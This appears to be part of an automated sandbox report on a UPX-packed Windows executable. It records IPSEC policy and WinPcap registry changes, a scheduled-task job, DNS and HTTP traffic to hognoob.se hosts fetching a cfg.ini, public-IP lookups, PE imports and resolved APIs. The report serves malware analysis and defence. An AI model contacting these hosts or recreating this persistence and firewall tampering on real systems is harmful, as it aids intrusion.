- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecNegotiationPolicyReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecNFAReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecNegotiationPolicyAction",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecNegotiationPolicyType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\whenChanged",
- "HKEY_LOCAL_MACHINE\\Software\\WinPcap",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\WinPcap\\(Default)",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\UninstallString",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\QuietUninstallString",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\DisplayIcon",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\DisplayName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\DisplayVersion",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\Publisher",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\URLInfoAbout",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\URLUpdateInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\VersionMajor",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\VersionMinor",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\InstalledBy",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\NoModify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\NoRepair",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecNegotiationPolicyReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecFilterReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ActivePolicy",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\IPSec",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IPSec\\OperationMode",
- "HKEY_CURRENT_USER\\Software\\Sysinternals\\ProcDump",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Sysinternals\\ProcDump\\EulaAccepted"
- ]
- [*] Deleted Registry Keys: [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\trztipllt.job",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\trztipllt.job.fp",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecOwnersReference"
- ]
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "uio.hognoob.se",
- "answers": [
- {
- "data": "185.164.72.143",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "upa1.hognoob.se",
- "answers": [
- {
- "data": "172.105.237.113",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "upa2.hognoob.se",
- "answers": [
- {
- "data": "139.162.13.92",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "2019.ip138.com",
- "answers": [
- {
- "data": "183.250.88.67",
- "type": "A"
- },
- {
- "data": "3.ip138.com",
- "type": "CNAME"
- }
- ]
- },
- {
- "type": "A",
- "request": "pxi.hognoob.se",
- "answers": [
- {
- "data": "80.82.70.188",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "ifconfig.me",
- "answers": [
- {
- "data": "216.239.34.21",
- "type": "A"
- },
- {
- "data": "216.239.36.21",
- "type": "A"
- },
- {
- "data": "216.239.38.21",
- "type": "A"
- },
- {
- "data": "216.239.32.21",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "isrg.trustid.ocsp.identrust.com",
- "answers": [
- {
- "data": "isrg.trustid.ocsp.identrust.com.edgesuite.net",
- "type": "CNAME"
- },
- {
- "data": "a279.dscq.akamai.net",
- "type": "CNAME"
- },
- {
- "data": "2.21.71.25",
- "type": "A"
- },
- {
- "data": "2.21.71.34",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "crl.identrust.com",
- "answers": [
- {
- "data": "192.35.177.64",
- "type": "A"
- },
- {
- "data": "apps.digsigtrust.com",
- "type": "CNAME"
- }
- ]
- }
- ]
- [*] Domains: [
- {
- "ip": "139.162.13.92",
- "domain": "upa2.hognoob.se"
- },
- {
- "ip": "2.21.71.25",
- "domain": "isrg.trustid.ocsp.identrust.com"
- },
- {
- "ip": "",
- "domain": "2019.ip138.com"
- },
- {
- "ip": "216.239.34.21",
- "domain": "ifconfig.me"
- },
- {
- "ip": "185.164.72.143",
- "domain": "uio.hognoob.se"
- },
- {
- "ip": "172.105.237.113",
- "domain": "upa1.hognoob.se"
- },
- {
- "ip": "192.35.177.64",
- "domain": "crl.identrust.com"
- },
- {
- "ip": "80.82.70.188",
- "domain": "pxi.hognoob.se"
- }
- ]
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 2,
- "body": "",
- "uri": "http://uio.hognoob.se:63145/cfg.ini",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
- "method": "GET",
- "host": "uio.hognoob.se:63145",
- "version": "1.1",
- "path": "/cfg.ini",
- "data": "GET /cfg.ini HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\nAccept: */*\r\nHost: uio.hognoob.se:63145\r\nCache-Control: no-cache\r\n\r\n",
- "port": 63145
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "isrg.trustid.ocsp.identrust.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: isrg.trustid.ocsp.identrust.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://crl.identrust.com/DSTROOTCAX3CRL.crl",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "crl.identrust.com",
- "version": "1.1",
- "path": "/DSTROOTCAX3CRL.crl",
- "data": "GET /DSTROOTCAX3CRL.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.identrust.com\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "RegCloseKey",
- "address": "0xa9e154"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0xa9e15c"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "ChooseColorA",
- "address": "0xa9e164"
- }
- ],
- "dll": "comdlg32.dll"
- },
- {
- "imports": [
- {
- "name": "Escape",
- "address": "0xa9e16c"
- }
- ],
- "dll": "GDI32.dll"
- },
- {
- "imports": [
- {
- "name": "GetAdaptersInfo",
- "address": "0xa9e174"
- }
- ],
- "dll": "iphlpapi.dll"
- },
- {
- "imports": [
- {
- "name": "LoadLibraryA",
- "address": "0xa9e17c"
- },
- {
- "name": "ExitProcess",
- "address": "0xa9e180"
- },
- {
- "name": "GetProcAddress",
- "address": "0xa9e184"
- },
- {
- "name": "VirtualProtect",
- "address": "0xa9e188"
- }
- ],
- "dll": "KERNEL32.DLL"
- },
- {
- "imports": [
- {
- "name": "OleRun",
- "address": "0xa9e190"
- }
- ],
- "dll": "ole32.dll"
- },
- {
- "imports": [
- {
- "name": "VariantCopy",
- "address": "0xa9e198"
- }
- ],
- "dll": "OLEAUT32.dll"
- },
- {
- "imports": [
- {
- "name": "RasHangUpA",
- "address": "0xa9e1a0"
- }
- ],
- "dll": "RASAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ShellExecuteA",
- "address": "0xa9e1a8"
- }
- ],
- "dll": "SHELL32.dll"
- },
- {
- "imports": [
- {
- "name": "GetDC",
- "address": "0xa9e1b0"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "VerQueryValueA",
- "address": "0xa9e1b8"
- }
- ],
- "dll": "VERSION.dll"
- },
- {
- "imports": [
- {
- "name": "InternetOpenA",
- "address": "0xa9e1c0"
- }
- ],
- "dll": "WININET.dll"
- },
- {
- "imports": [
- {
- "name": "waveOutOpen",
- "address": "0xa9e1c8"
- }
- ],
- "dll": "WINMM.dll"
- },
- {
- "imports": [
- {
- "name": "OpenPrinterA",
- "address": "0xa9e1d0"
- }
- ],
- "dll": "WINSPOOL.DRV"
- },
- {
- "imports": [
- {
- "name": "recvfrom",
- "address": "0xa9e1d8"
- }
- ],
- "dll": "WS2_32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x00539452",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x00a9d5b0",
- "timestamp": "2019-06-24 19:13:25",
- "osversion": "4.0",
- "sections": [
- {
- "name": "UPX0",
- "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x00000400",
- "virtual_size": "0x00170000",
- "characteristics_raw": "0xe0000080"
- },
- {
- "name": "UPX1",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00171000",
- "size_of_data": "0x0052c800",
- "entropy": "7.82",
- "raw_address": "0x00000400",
- "virtual_size": "0x0052d000",
- "characteristics_raw": "0xe0000040"
- },
- {
- "name": "UPX2",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0069e000",
- "size_of_data": "0x00000400",
- "entropy": "3.70",
- "raw_address": "0x0052cc00",
- "virtual_size": "0x00001000",
- "characteristics_raw": "0xc0000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0069e000",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000037c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "7e8fd41cc4af90fd0b2731fbcc919e1a",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 16,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "kernel32.dll.FileTimeToSystemTime",
- "kernel32.dll.GetTimeZoneInformation",
- "kernel32.dll.SetLastError",
- "kernel32.dll.GetSystemDirectoryA",
- "kernel32.dll.GetWindowsDirectoryA",
- "kernel32.dll.GetCurrentProcess",
- "kernel32.dll.MultiByteToWideChar",
- "kernel32.dll.WideCharToMultiByte",
- "kernel32.dll.Process32Next",
- "kernel32.dll.Process32First",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.SetFilePointer",
- "kernel32.dll.GetFileSize",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.OpenProcess",
- "kernel32.dll.GetVersion",
- "kernel32.dll.TerminateThread",
- "kernel32.dll.CreateSemaphoreA",
- "kernel32.dll.ResumeThread",
- "kernel32.dll.ReleaseSemaphore",
- "kernel32.dll.EnterCriticalSection",
- "kernel32.dll.LeaveCriticalSection",
- "kernel32.dll.GetProfileStringA",
- "kernel32.dll.WriteFile",
- "kernel32.dll.InterlockedExchange",
- "kernel32.dll.IsBadCodePtr",
- "kernel32.dll.CompareStringW",
- "kernel32.dll.CompareStringA",
- "kernel32.dll.GetStringTypeW",
- "kernel32.dll.GetStringTypeA",
- "kernel32.dll.SetUnhandledExceptionFilter",
- "kernel32.dll.IsBadWritePtr",
- "kernel32.dll.VirtualAlloc",
- "kernel32.dll.LCMapStringW",
- "kernel32.dll.LCMapStringA",
- "kernel32.dll.SetEnvironmentVariableA",
- "kernel32.dll.VirtualFree",
- "kernel32.dll.HeapCreate",
- "kernel32.dll.HeapDestroy",
- "kernel32.dll.GetEnvironmentVariableA",
- "kernel32.dll.GetStdHandle",
- "kernel32.dll.SetHandleCount",
- "kernel32.dll.GetEnvironmentStringsW",
- "kernel32.dll.GetEnvironmentStrings",
- "kernel32.dll.FreeEnvironmentStringsW",
- "kernel32.dll.FreeEnvironmentStringsA",
- "kernel32.dll.UnhandledExceptionFilter",
- "kernel32.dll.GetFileType",
- "kernel32.dll.SetStdHandle",
- "kernel32.dll.GetACP",
- "kernel32.dll.HeapSize",
- "kernel32.dll.RaiseException",
- "kernel32.dll.GetLocalTime",
- "kernel32.dll.GetSystemTime",
- "kernel32.dll.RtlUnwind",
- "kernel32.dll.GetStartupInfoA",
- "kernel32.dll.GetOEMCP",
- "kernel32.dll.GetCPInfo",
- "kernel32.dll.GetProcessVersion",
- "kernel32.dll.SetErrorMode",
- "kernel32.dll.GlobalFlags",
- "kernel32.dll.GetCurrentThread",
- "kernel32.dll.GetFileTime",
- "kernel32.dll.TlsGetValue",
- "kernel32.dll.LocalReAlloc",
- "kernel32.dll.TlsSetValue",
- "kernel32.dll.TlsFree",
- "kernel32.dll.GlobalHandle",
- "kernel32.dll.TlsAlloc",
- "kernel32.dll.LocalAlloc",
- "kernel32.dll.lstrcmpA",
- "kernel32.dll.GlobalGetAtomNameA",
- "kernel32.dll.GlobalAddAtomA",
- "kernel32.dll.GlobalFindAtomA",
- "kernel32.dll.GlobalDeleteAtom",
- "kernel32.dll.lstrcmpiA",
- "kernel32.dll.SetEndOfFile",
- "kernel32.dll.UnlockFile",
- "kernel32.dll.LockFile",
- "kernel32.dll.FlushFileBuffers",
- "kernel32.dll.DuplicateHandle",
- "kernel32.dll.lstrcpynA",
- "kernel32.dll.FileTimeToLocalFileTime",
- "kernel32.dll.LocalFree",
- "kernel32.dll.InterlockedDecrement",
- "kernel32.dll.InterlockedIncrement",
- "kernel32.dll.WaitForMultipleObjects",
- "kernel32.dll.CreateFileA",
- "kernel32.dll.SetEvent",
- "kernel32.dll.FindResourceA",
- "kernel32.dll.LoadResource",
- "kernel32.dll.LockResource",
- "kernel32.dll.ReadFile",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.WaitForSingleObject",
- "kernel32.dll.CreateProcessA",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.GetCommandLineA",
- "kernel32.dll.MulDiv",
- "kernel32.dll.GetProcAddress",
- "kernel32.dll.GetModuleHandleA",
- "kernel32.dll.GetVolumeInformationA",
- "kernel32.dll.SetCurrentDirectoryA",
- "kernel32.dll.CreateDirectoryA",
- "kernel32.dll.CopyFileA",
- "kernel32.dll.DeleteFileA",
- "kernel32.dll.lstrlenW",
- "kernel32.dll.RemoveDirectoryA",
- "kernel32.dll.GetModuleFileNameA",
- "kernel32.dll.GetCurrentThreadId",
- "kernel32.dll.ExitProcess",
- "kernel32.dll.GlobalSize",
- "kernel32.dll.GlobalFree",
- "kernel32.dll.DeleteCriticalSection",
- "kernel32.dll.InitializeCriticalSection",
- "kernel32.dll.lstrcatA",
- "kernel32.dll.lstrlenA",
- "kernel32.dll.WinExec",
